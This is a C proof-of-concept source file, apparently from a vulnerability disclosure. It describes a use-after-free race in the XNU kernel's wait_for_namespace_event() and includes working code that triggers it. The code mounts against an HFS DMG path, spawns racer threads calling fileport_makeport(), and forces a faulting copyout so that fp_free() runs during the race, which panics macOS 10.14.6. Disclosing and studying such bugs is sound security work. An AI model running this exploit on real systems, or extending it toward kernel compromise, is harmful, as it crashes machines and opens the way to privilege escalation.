// Brandon Azad
#if 0
iOS/macOS: Kernel use-after-free due to race condition in wait_for_namespace_event()

The XNU function wait_for_namespace_event() in bsd/vfs/vfs_syscalls.c releases a file descriptor
for use by userspace but may then subsequently destroy that file descriptor using fp_free(), which
unconditionally frees the fileproc and fileglob. This opens up a race window during which the
process could manipulate those objects while they're being freed. Exploitation requires root
privileges.

The function wait_for_namespace_event() is reachable from fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT); it
is used to listen for filesystem events for generating a snapshot. Here is the vulnerable path in
the code:

	static int
	wait_for_namespace_event(namespace_handler_data *nhd, nspace_type_t nspace_type)
	{
	...
			error = falloc(p, &fp, &indx, ctx);
			if (error) goto cleanup;
			fp_alloc_successful = true;
	...
			proc_fdlock(p);
			procfdtbl_releasefd(p, indx, NULL);
			fp_drop(p, indx, fp, 1);
			proc_fdunlock(p);
	...
			error = copyout(&nspace_items[i].token, nhd->token, sizeof(uint32_t));
			if (error) goto cleanup;
	...
	cleanup:
			if (error) {
				if (fp_alloc_successful) fp_free(p, indx, fp);
	...
	}

First the file descriptor (indx) and fileproc (fp) are allocated using falloc(). At this point the
file descriptor is reserved, and hence unavailable to userspace. Next, procfdtbl_releasefd() is
called to release the file descriptor for use by userspace. After the subsequent proc_fdunlock(),
another thread in the process could access that file descriptor via another syscall, even while
wait_for_namespace_event() is still running.

This is problematic because in its error path (reachable if copyout() fails),
wait_for_namespace_event() expects to be able to free the file descriptor with fp_free(). fp_free()
is a very special-purpose function: it will clear the file descriptor, free the fileglob, and free
the fileproc, without taking into consideration whether the fileproc or fileglob is referenced
anywhere else.

One way to violate these expectations is to make a call to fileport_makeport() in between the
proc_fdunlock() and the fp_free(). The ideal case for exploitation would be that a fileport is
created which holds a reference to the fileglob before the fp_free() is used to free it, leaving a
dangling fileglob pointer in the fileport. In practice it's tricky to end up in that state, but I
believe it's possible.

The attached POC should trigger a kernel panic. The POC works as follows: First, an HFS DMG is
created and mounted because the only paths that reach wait_for_namespace_event() pass through the
HFS driver. Next, several racer threads are created which repeatedly try to call
fileport_makeport(). Then, fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT) is called to block in
wait_for_namespace_event(). The namespace_handler_info_ext structure passed to fsctl() is set up
such that the last call to copyout() will fail, which will cause fp_free() to be called. Finally,
in order to trigger the bug, another process creates and removes a directory on the mounted HFS
DMG, which causes nspace_snapshot_event() to generate an event that wait_for_namespace_event() was
waiting for. Usually this will generate a panic with the message "a freed zone element has been
modified".

Tested on macOS 10.14.6 (18G87).
#endif

#include <assert.h>
#include <mach/mach.h>
#include <pthread.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>

// Argument block handed to fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT). Every member is a userspace
// pointer; main() points them at its own buffers and prints those buffers after the call.
// NOTE(review): the layout presumably mirrors the kernel's own definition of this structure;
// confirm against the XNU headers for the target build.
struct namespace_handler_info_ext {
	// Destination for the event token; wait_for_namespace_event() copyout()s
	// sizeof(uint32_t) bytes here.
	int32_t    *token;
	// Presumably receives event flags from the kernel -- confirm.
	int64_t    *flags;
	// Presumably receives the number of the newly allocated file descriptor -- confirm.
	int32_t    *fdptr;
	// Treated as a two-element array (infoptr[0], infoptr[1]) by main(), which positions it so
	// that the last byte of infoptr[1] falls on an unmapped page.
	int64_t    *infoptr;
};

// fsctl() request codes used by main(). They are spelled out here rather than taken from a
// header. NOTE(review): the group letter and command numbers presumably match the kernel's
// definitions for the tested release -- confirm before porting to another OS version.
//
// FSIOC_SNAPSHOT_HANDLER_GET_EXT: blocks in wait_for_namespace_event() until a snapshot event
// arrives; takes a struct namespace_handler_info_ext.
#define FSIOC_SNAPSHOT_HANDLER_GET_EXT			_IOW('A', 13, struct namespace_handler_info_ext)
// FSIOC_NAMESPACE_HANDLER_SET_SNAPSHOT_TIME: sets the snapshot time; takes an int32_t.
#define FSIOC_NAMESPACE_HANDLER_SET_SNAPSHOT_TIME	_IOW('A', 8, int32_t)
// FSIOC_NAMESPACE_ALLOW_DMG_SNAPSHOT_EVENTS: allows snapshot events on DMGs; takes an int32_t.
#define FSIOC_NAMESPACE_ALLOW_DMG_SNAPSHOT_EVENTS	_IOW('A', 11, int32_t)

// Number of racer threads to create. Each one gets its own slot in fileport[] below.
#define THREAD_COUNT	20

// We will target file descriptor 0, since this is the lowest file descriptor number and hence the
// first to be reused.
#define TARGET_FD	0

// Global space for each thread to stash its fileport if it wins the race. Slot i is written only
// by the racer thread whose id is i. The array starts out all-zero; the explicit { 0 } replaces
// an empty initializer list, which is not valid C before C23.
mach_port_t fileport[THREAD_COUNT] = { 0 };

// Prototype for fileport_makeport(), declared by hand in this file. The racer threads call it
// with a file descriptor and a pointer to the slot that should receive the resulting port name,
// and treat a return value of 0 as success.
// NOTE(review): presumably none of the headers included above declare this function -- confirm.
extern int fileport_makeport(int fd, mach_port_t *name);

// Racer thread body: spin on fileport_makeport() for the target file descriptor until one call
// succeeds, then exit.
//
// The target descriptor starts out unallocated, so every attempt fails until
// wait_for_namespace_event() has created the new fd and made it visible with
// procfdtbl_releasefd() and proc_fdunlock(). From that moment userspace can operate on the
// descriptor even though the kernel function is still working with it. The aim is to land a
// successful call inside the window between proc_fdunlock() and fp_free(), either capturing a
// pointer to the fileglob before it is freed or touching a fileproc that has already been freed.
//
// arg carries this thread's index into fileport[], packed into the pointer value. The return
// value is always NULL.
static void *
stash_fileport_racer(void *arg) {
	const int slot = (int)(uintptr_t)arg;
	// Keep retrying; a zero return means the descriptor was wrapped in a fileport, which is now
	// recorded in this thread's slot.
	while (fileport_makeport(TARGET_FD, &fileport[slot]) != 0) {
		// Retry immediately: the race window is short, so do not yield or sleep here.
	}
	return NULL;
}

// PoC entry point. Usage: <program> <hfs-dmg-mount>
//
// argv[1] is the path passed to every fsctl() call below (the mounted HFS DMG). The function
// prepares a buffer that makes the kernel's last copyout() fault, starts the racer threads,
// configures snapshot events, and then blocks in fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT).
//
// Returns 1 on a usage error or if a racer thread cannot be created, and 0 once the final
// fsctl() has returned. Failures of the other setup calls trip assert().
int
main(int argc, const char *argv[]) {
	// Refuse to run without a mount point rather than handing a NULL path to fsctl().
	if (argc < 2) {
		fprintf(stderr, "usage: %s <hfs-dmg-mount>\n", argc > 0 ? argv[0] : "poc");
		return 1;
	}
	const char *hfs_dmg_mount = argv[1];
	// Create a mapped region right in front of an unmapped one. We'll force a copyout() to an
	// unmapped address to ensure that wait_for_namespace_event() takes the path that
	// fp_free()'s the fileproc (hopefully after we've grabbed a reference to it). In order to
	// maximize the time for the race window, we'll have the last byte of
	// namespace_handler_info_ext->infoptr[1] be on the unmapped page.
	const size_t unmapped_offset = 0x4000;
	uint8_t *map = mmap(NULL, 2 * unmapped_offset,
			PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	assert(map != MAP_FAILED);
	int ret = munmap(map + unmapped_offset, unmapped_offset);
	assert(ret == 0);
	// Close the target file descriptor so that it will be allocated by
	// wait_for_namespace_event().
	close(TARGET_FD);
	// Create the racer threads. These threads will try to stash the target file descriptor
	// into a fileport after wait_for_namespace_event() has exposed the file descriptor but
	// before the fp_free().
	for (int id = 0; id < THREAD_COUNT; id++) {
		pthread_t thread;
		ret = pthread_create(&thread, NULL, stash_fileport_racer, (void *)(uintptr_t)id);
		if (ret != 0) {
			// Do not fall through to pthread_detach(): thread is not a valid handle if
			// creation failed.
			fprintf(stderr, "pthread_create failed for racer %d (error %d)\n", id, ret);
			return 1;
		}
		pthread_detach(thread);
	}
	// Set the snapshot time to as high as possible so that nspace_snapshot_event() will pass
	// the event to resolve_nspace_item_ext().
	int32_t snapshot_time = -1;
	ret = fsctl(hfs_dmg_mount, FSIOC_NAMESPACE_HANDLER_SET_SNAPSHOT_TIME, &snapshot_time, 0);
	assert(ret == 0);
	// Set the kernel to allow snapshot events on DMGs.
	int32_t allow = 1;
	ret = fsctl(hfs_dmg_mount, FSIOC_NAMESPACE_ALLOW_DMG_SNAPSHOT_EVENTS, &allow, 0);
	assert(ret == 0);
	// Call the vulnerable function wait_for_namespace_event(). Because infoptr points to
	// unmapped memory, the error path will be taken, causing fp_free() to be called.
	// The 0xab... fill patterns make it easy to see which outputs the kernel overwrote; the
	// casts make the conversion of these out-of-range constants to signed types explicit.
	int32_t token = (int32_t)0xabababab;
	int64_t flags = (int64_t)0xabababababababab;
	int32_t fd = (int32_t)0xabababab;
	// The "+ 1" deliberately misaligns info so that info[0] and all but the last byte of
	// info[1] lie in the mapped region, with that final byte on the unmapped page. The direct
	// accesses to info[0] below assume the CPU tolerates unaligned 64-bit loads and stores.
	int64_t *info = (int64_t *)(map + unmapped_offset - 2 * sizeof(int64_t) + 1);
	info[0] = (int64_t)0xabababababababab;
	struct namespace_handler_info_ext nhie = {
		.token   = &token,
		.flags   = &flags,
		.fdptr   = &fd,
		.infoptr = info,
	};
	ret = fsctl(hfs_dmg_mount, FSIOC_SNAPSHOT_HANDLER_GET_EXT, &nhie, 0);
	// If we get here the kernel survived the call; report what it returned and what it wrote.
	printf("fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT) returned %d\n", ret);
	printf("namespace_handler_info_ext = {\n"
			"\ttoken   = 0x%08x\n"
			"\tflags   = 0x%016llx\n"
			"\tfd      = 0x%08x\n"
			"\tinfo[0] = 0x%016llx\n"
			"\tinfo[1] = ???\n"
			"}\n",
			(unsigned int)token, (unsigned long long)flags,
			(unsigned int)fd, (unsigned long long)info[0]);
	// Give the racer threads a moment to act on the descriptor before the process exits.
	sleep(1);
	return 0;
}
